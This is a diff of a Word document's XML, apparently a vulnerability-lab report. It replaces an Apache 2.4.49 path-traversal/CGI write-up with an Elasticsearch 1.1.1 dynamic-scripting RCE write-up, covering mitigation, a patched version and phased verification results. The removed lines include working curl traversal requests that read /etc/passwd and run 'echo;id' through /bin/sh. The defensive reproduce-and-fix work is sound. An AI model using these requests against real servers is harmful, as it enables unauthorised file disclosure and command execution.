-        <w:t>%%32%65</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-        <w:spacing w:after="40"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:b/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>Restore default-deny</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> — </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>&lt;Directory /&gt; Require all denied</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>, with an</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">explicit </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>&lt;Directory "/usr/local/apache2/htdocs"&gt; Require all granted</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>. Even a</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">future traversal bug can no longer read </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>/etc/passwd</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-        <w:spacing w:after="40"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:b/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>Reduce the attack surface</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> — </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>mod_cgi</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>mod_cgid</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> are not loaded. A static</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>file service has nothing to execute, so file disclosure cannot become RCE.</w:t>
+        <w:t>Same three requests, rebuilt environments:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4601,167 +4444,21 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="17"/>
         </w:rPr>
-        <w:t>FROM httpd:2.4.51</w:t>
-        <w:br/>
-        <w:t>RUN sed -i 's|^LoadModule cgi_module|#LoadModule cgi_module|'  /usr/local/apache2/conf/httpd.conf ; \</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">    sed -i 's|^LoadModule cgid_module|#LoadModule cgid_module|' /usr/local/apache2/conf/httpd.conf</w:t>
-        <w:br/>
-        <w:t>COPY hardening.conf /usr/local/apache2/conf/extra/hardening.conf</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>Why this is effective: layer 1 removes the vulnerable code path; layers 2 and 3</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>are not redundant "belt and braces" but separate trust boundaries — the</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>authorisation layer protects against *any* path-normalisation bug, and the</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>attack-surface layer protects against *any* file-disclosure bug being escalated</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>to code execution.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="26"/>
-        </w:rPr>
-        <w:t>9. Proof that the vulnerability is eliminated</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>Same commands, rebuilt environment:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="80" w:after="160"/>
-        <w:ind w:left="227"/>
-        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="17"/>
-        </w:rPr>
         <w:t>$ cd vulnerability/fixed &amp;&amp; docker compose up --build -d</w:t>
         <w:br/>
+        <w:t>$ curl -s -XPOST 'http://127.0.0.1:9200/_search' -d '{... script_fields ...}'</w:t>
         <w:br/>
-        <w:t>$ curl --path-as-is -i 'http://127.0.0.1:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'</w:t>
-        <w:br/>
-        <w:t>HTTP/1.1 400 Bad Request</w:t>
-        <w:br/>
-        <w:t>Server: Apache/2.4.51 (Unix)</w:t>
-        <w:br/>
-        <w:t># body contains no root:x:0:0</w:t>
+        <w:t>HTTP/1.1 400   ScriptException[dynamic scripting for [groovy] disabled]</w:t>
         <w:br/>
         <w:br/>
-        <w:t>$ curl --path-as-is -i --data 'echo;id' 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'</w:t>
+        <w:t>$ docker compose exec -T es cat /tmp/pwned.txt</w:t>
         <w:br/>
-        <w:t>HTTP/1.1 400 Bad Request</w:t>
+        <w:t>cat: /tmp/pwned.txt: No such file or directory     # nothing executed</w:t>
         <w:br/>
-        <w:t>Server: Apache/2.4.51 (Unix)</w:t>
         <w:br/>
-        <w:t># body contains no uid=</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>Regression test — the service must still work:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="80" w:after="160"/>
-        <w:ind w:left="227"/>
-        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="17"/>
-        </w:rPr>
-        <w:t>$ curl -s -i http://127.0.0.1:8080/</w:t>
+        <w:t>$ curl -s 'http://127.0.0.1:9200/blog/post/_search?q=hello'</w:t>
         <w:br/>
-        <w:t>HTTP/1.1 200 OK</w:t>
-        <w:br/>
-        <w:t>&lt;html&gt;&lt;body&gt;&lt;h1&gt;It works!&lt;/h1&gt;&lt;/body&gt;&lt;/html&gt;</w:t>
+        <w:t>{"hits":{"total":1, ...}}                          # service still works</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4787,7 +4484,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>To show that the patch and the hardening are two *different* controls, the</w:t>
+        <w:t>To separate *mitigation* from *patch*, the vulnerable 1.1.1 image was also run</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4800,7 +4497,21 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>vulnerable 2.4.49 binary was also run with its default (secure) configuration,</w:t>
+        <w:t xml:space="preserve">with </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>script.disable_dynamic: true</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>, i.e. the code is still 1.1.1 but the</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4813,21 +4524,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">i.e. the code is still vulnerable but </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>Require all denied</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> and no CGI.</w:t>
+        <w:t>capability is switched off.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -4867,7 +4564,7 @@
                 <w:b/>
                 <w:sz w:val="16"/>
               </w:rPr>
-              <w:t>Server</w:t>
+              <w:t>version.number</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4875,7 +4572,7 @@
                 <w:b/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve"> header)</w:t>
+              <w:t>)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4895,7 +4592,19 @@
                 <w:b/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">Traversal → </w:t>
+              <w:t>Attack response</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2339"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4903,7 +4612,7 @@
                 <w:b/>
                 <w:sz w:val="16"/>
               </w:rPr>
-              <w:t>/etc/passwd</w:t>
+              <w:t>/tmp/pwned.txt</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4923,27 +4632,7 @@
                 <w:b/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>CGI execution</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2339"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-                <w:b/>
-                <w:sz w:val="16"/>
-              </w:rPr>
-              <w:t>GET /</w:t>
+              <w:t>Normal search</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4957,24 +4646,17 @@
             <w:r/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>2.4.49 + Vulhub config (</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                 <w:sz w:val="16"/>
               </w:rPr>
-              <w:t>Apache/2.4.49</w:t>
+              <w:t>vulnerable/</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>)</w:t>
+              <w:t xml:space="preserve"> — 1.1.1, scripting on</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5004,7 +4686,7 @@
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                 <w:sz w:val="16"/>
               </w:rPr>
-              <w:t>root:x:0:0:root:/root:/bin/bash</w:t>
+              <w:t>pwn: ["java.lang.UNIXProcess@…"]</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5020,21 +4702,7 @@
                 <w:b/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>200</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-                <w:sz w:val="16"/>
-              </w:rPr>
-              <w:t>uid=1(daemon) gid=1(daemon)</w:t>
+              <w:t>`uid=0(root)`</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5049,7 +4717,7 @@
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>200</w:t>
+              <w:t>1 hit</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5063,24 +4731,24 @@
             <w:r/>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+                <w:sz w:val="16"/>
+              </w:rPr>
+              <w:t>hardened/</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>2.4.49 + default config (</w:t>
+              <w:t xml:space="preserve"> — 1.1.1 + </w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                 <w:sz w:val="16"/>
               </w:rPr>
-              <w:t>Apache/2.4.49</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>)</w:t>
+              <w:t>script.disable_dynamic</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5096,7 +4764,75 @@
                 <w:b/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>403 Forbidden</w:t>
+              <w:t>400</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+                <w:sz w:val="16"/>
+              </w:rPr>
+              <w:t>dynamic scripting disabled</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2339"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>absent</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2339"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>1 hit</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2339"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+                <w:sz w:val="16"/>
+              </w:rPr>
+              <w:t>fixed/</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> — 1.4.4</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5112,7 +4848,21 @@
                 <w:b/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>403 Forbidden</w:t>
+              <w:t>400</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+                <w:sz w:val="16"/>
+              </w:rPr>
+              <w:t>dynamic scripting for [groovy] disabled</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5127,70 +4877,7 @@
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>200</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2339"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>2.4.51 + hardening (</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-                <w:sz w:val="16"/>
-              </w:rPr>
-              <w:t>Apache/2.4.51</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>)</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2339"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-                <w:b/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>400 Bad Request</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2339"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-                <w:b/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>400 Bad Request</w:t>
+              <w:t>absent</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5205,7 +4892,7 @@
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>200</w:t>
+              <w:t>1 hit</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5235,7 +4922,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>row 1 is the vulnerability;</w:t>
+        <w:t>row 1 is the vulnerability — the command really ran, as root;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5248,7 +4935,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>row 2 is the *configuration* layer alone — the vulnerable code is present,</w:t>
+        <w:t>row 2 is the mitigation alone — same vulnerable code, attack refused, so the</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5261,11 +4948,24 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>the attack still fails, so the fix cannot rely on the version bump being</w:t>
+        <w:t>fix does not depend on the upgrade being possible;</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+        <w:spacing w:after="40"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>row 3 is the patched release — the request dies before any script is</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:after="120"/>
         <w:jc w:val="both"/>
       </w:pPr>
@@ -5274,20 +4974,20 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>applied correctly everywhere;</w:t>
+        <w:t>compiled, and the error names the new default engine (Groovy), which shows</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-        <w:spacing w:after="40"/>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>row 3 is the *patch* — the request now dies inside the normaliser (400)</w:t>
+        <w:t>the server still understands the request but no longer evaluates it.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5300,47 +5000,21 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>before authorisation, which is what a genuine code fix looks like. A 403</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
+        <w:t>Automated verdict (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>vulnerability/run_demo.ps1 -Phase all</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>would mean "the router still resolved it and authorisation caught it".</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>Automated verdict (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>vulnerability/run_demo.ps1 -Phase all</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>), one run per phase:</w:t>
+        <w:t>):</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5354,31 +5028,31 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="17"/>
         </w:rPr>
-        <w:t>PHASE 1: Apache 2.4.49 + Vulhub config</w:t>
+        <w:t>PHASE 1: Elasticsearch 1.1.1 (dynamic scripting enabled)</w:t>
         <w:br/>
-        <w:t>VERDICT: file disclosure = SUCCESS (vulnerable, as expected)</w:t>
+        <w:t>VERDICT: code execution = SUCCESS (vulnerable, as expected)</w:t>
         <w:br/>
-        <w:t>VERDICT: command execution = SUCCESS (vulnerable, as expected)</w:t>
+        <w:t>VERDICT: normal search = OK</w:t>
         <w:br/>
         <w:t>Result: PASS - vulnerability reproduced</w:t>
         <w:br/>
         <w:br/>
-        <w:t>PHASE 2: Apache 2.4.49 (still vulnerable code) + default hardening</w:t>
+        <w:t>PHASE 2: Elasticsearch 1.1.1 + script.disable_dynamic</w:t>
         <w:br/>
-        <w:t>VERDICT: traversal blocked = True</w:t>
+        <w:t>VERDICT: script rejected = True</w:t>
         <w:br/>
-        <w:t>VERDICT: command execution blocked = True</w:t>
+        <w:t>VERDICT: command executed = False</w:t>
         <w:br/>
         <w:t>VERDICT: normal functionality intact = True</w:t>
         <w:br/>
         <w:t>Result: PASS - vulnerability eliminated</w:t>
         <w:br/>
         <w:br/>
-        <w:t>PHASE 3: Apache 2.4.51 + hardening</w:t>
+        <w:t>PHASE 3: Elasticsearch 1.4.4 (dynamic scripting off by default)</w:t>
         <w:br/>
-        <w:t>VERDICT: traversal blocked = True</w:t>
+        <w:t>VERDICT: script rejected = True</w:t>
         <w:br/>
-        <w:t>VERDICT: command execution blocked = True</w:t>
+        <w:t>VERDICT: command executed = False</w:t>
         <w:br/>
         <w:t>VERDICT: normal functionality intact = True</w:t>
         <w:br/>
@@ -5395,21 +5069,21 @@
